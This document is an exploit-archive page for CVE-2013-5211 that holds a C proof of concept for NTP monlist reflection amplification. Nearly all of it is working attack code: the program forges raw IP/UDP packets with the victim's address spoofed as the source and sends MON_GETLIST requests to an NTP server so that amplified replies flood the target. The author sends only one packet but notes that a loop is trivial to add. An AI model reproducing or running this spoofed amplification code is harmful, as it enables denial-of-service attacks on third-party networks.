#; NTP ntpd monlist Query Reflection - Denial of Service

1. Full title NTP ntpd monlist Query Reflection - Denial of Service
2. Date add 2014-04-29
3. Category dos / poc
4. Platform linux
5. Risk <font color="#FFFF00">Security Risk Medium</font>
6. CVE CVE: 2013-5211
7. ==============================================
8.  
9. /*
10.  * Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification
11.  * Date: 28/04/2014
12.  * Code Author: Danilo PC - <DaNotKnow@gmail.com>
13.  * CVE : CVE-2013-5211
14. */
15.   
16. /* I coded this program to help other to understand how an DDoS attack amplified by NTP servers works (CVE-2013-5211)
17.  * I took of the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there's a lot of kiddies out there,
18.  *  if you know how to program, making a loop or using with other tool is piece of cake. There core idea is there, just use it as you please.
19.  */
20.   
21. //------------------------------------------------------------------------------------------------//
22. //------------------------------------------------------------------------------------------------//
23.   
24.   
25. #include <stdio.h>         //For on printf function
26. #include <string.h>        //For memset
27. #include <sys/socket.h>    //Structs and Functions used for sockets operations.
28. #include <stdlib.h>      //For exit function
29. #include <netinet/ip.h>    //Structs for IP header
30.   
31. //Struct for UDP Packet
32. struct udpheader{
33.     unsigned short int udp_sourcePortNumber;
34.     unsigned short int udp_destinationPortNumber;
35.     unsigned short int udp_length;
36.     unsigned short int udp_checksum;
37. };
38.   
39. // Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler
40. struct  ntpreqheader {
41.     unsigned char rm_vn_mode;       /* response, more, version, mode */
42.     unsigned char auth_seq;     /* key, sequence number */
43.     unsigned char implementation;       /* implementation number */
44.     unsigned char request;          /* request number */
45.     unsigned short err_nitems;      /* error code/number of data items */
46.     unsigned short  mbz_itemsize;       /* item size */
47.     char data[40];              /* data area [32 prev](176 byte max) */
48.     unsigned long tstamp;           /* time stamp, for authentication */
49.     unsigned int keyid;         /* encryption key */
50.     char mac[8];        /* (optional) 8 byte auth code */
51. };
52.   
53.   
54. // Calculates the checksum of the ip header.
55. unsigned short csum(unsigned short *ptr,int nbytes)
56. {
57.     register long sum;
58.     unsigned short oddbyte;
59.     register short answer;
60.   
61.     sum=0;
62.     while(nbytes>1) {
63.         sum+=*ptr++;
64.         nbytes-=2;
65.     }
66.     if(nbytes==1) {
67.         oddbyte=0;
68.         *((u_char*)&oddbyte)=*(u_char*)ptr;
69.         sum+=oddbyte;
70.     }
71.   
72.     sum = (sum>>16)+(sum & 0xffff);
73.     sum = sum + (sum>>16);
74.     answer=(short)~sum;
75.     return(answer);
76. }
77.   
78.   
79. //Da MAIN
80.   
81. int main(int argc, char **argv)
82. {
83. int status;         // Maintains the return values of the functions
84. struct iphdr *ip;       // Pointer to ip header struct
85. struct udpheader *udp;      // Pointer to udp header struct
86. struct ntpreqheader *ntp;   // Pointer to ntp request header struct
87. int sockfd;         // Maintains the socket file descriptor
88. int one = 1;            // Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.
89. struct sockaddr_in dest;    // Maintains the data of the destination address
90. char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself
91.   
92. // Parameters check
93.     if( argc != 3){
94.         printf("Usage: ./ntpDdos [Target IP] [NTP Server IP]\n");
95.         printf("Example: ./ntpDdos 1.2.3.4 127.0.0.1 \n");
96.         printf("Watch it on wireshark!\n");
97.         printf("Coded for education purpose only!\n");
98.         exit(1);
99.     }
100.   
101. // Create a socket and tells the kernel that we want to use udp as layer 4 protocol
102.     sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
103.     if (sockfd == -1){
104.         printf("Error on initializing the socket\n");
105.         exit(1);
106.     }
107.   
108.   
109.   
110. //Sets the option IP_HDRINCL
111.     status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);
112.     if (status == -1){
113.                 printf("Error on setting the option HDRINCL on socket\n");
114.                 exit(1);
115.         }
116.   
117.   
118. //"Zeroes" all the packet stack
119.     memset( packet, 0, sizeof(packet) );
120.   
121.   
122. //Mounts the packet headers
123. // [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!
124.     ip = (struct iphdr *)packet;
125.     udp = (struct udpheader *) (packet + sizeof(struct iphdr) );
126.     ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );
127.   
128.   
129. //Fill the IP Header
130.     ip->version = 4;     //IPv4
131.         ip->ihl = 5;         //Size of the Ip header, minimum 5
132.         ip->tos = 0;         //Type of service, the default value is 0
133.         ip->tot_len = sizeof(packet);   //Size of the datagram
134.         ip->id = htons(1234);    //LengthIdentification Number
135.         ip->frag_off = 0;        //Flags, zero represents reserved
136.         ip->ttl = 255;               //Time to Live. Maximum of 255
137.         ip->protocol = IPPROTO_UDP;  //Sets the UDP as the next layer protocol
138.         ip->check = 0;               //Checksum.
139.         ip->saddr = inet_addr( argv[1] );  //Source ip ( spoofing goes here)
140.         ip->daddr = inet_addr( argv[2] ); //Destination IP
141.   
142.     //Fills the UDP Header
143.     udp->udp_sourcePortNumber = htons( atoi( "123" ) );       //Source Port
144.     udp->udp_destinationPortNumber = htons(atoi("123")) ;   //Destination Port
145.     udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet
146.     udp->udp_checksum = 0;                    //Checksum
147.   
148.     //Calculate the checksums
149.     ip->check = csum((unsigned short *)packet, ip->tot_len);   //Calculate the checksum for iP header
150.   
151.     //Sets the destination data
152.     dest.sin_family = AF_INET;               // Address Family Ipv4
153.     dest.sin_port = htons (atoi( "123" ) ) ;        // Destination port
154.     dest.sin_addr.s_addr = inet_addr( argv[2] );       // Destination Endereço para onde se quer enviar o pacote
155.   
156.     //Fills the NTP header
157.     //Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST
158.     //To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the
159.     // ntp request packet and hardcoded the values for the fields to make a "MON_GETLIST" request packet.
160.     // To learn more, read this: http://searchcode.com/codesearch/view/451164#127
161.     ntp->rm_vn_mode=0x17;       //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7
162.     ntp->implementation=0x03;   //Sets the implementation to 3
163.     ntp->request=0x2a;       //Sets the request field to 42 ( MON_GETLIST )
164.                     //All the other fields of the struct are zeroed
165.       
166.   
167.     // Sends the packets
168.     status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );
169.         if(status <0){
170.             printf("Failed to send the packets\n");
171.             exit(1);
172.         }
173.   
174.   
175. }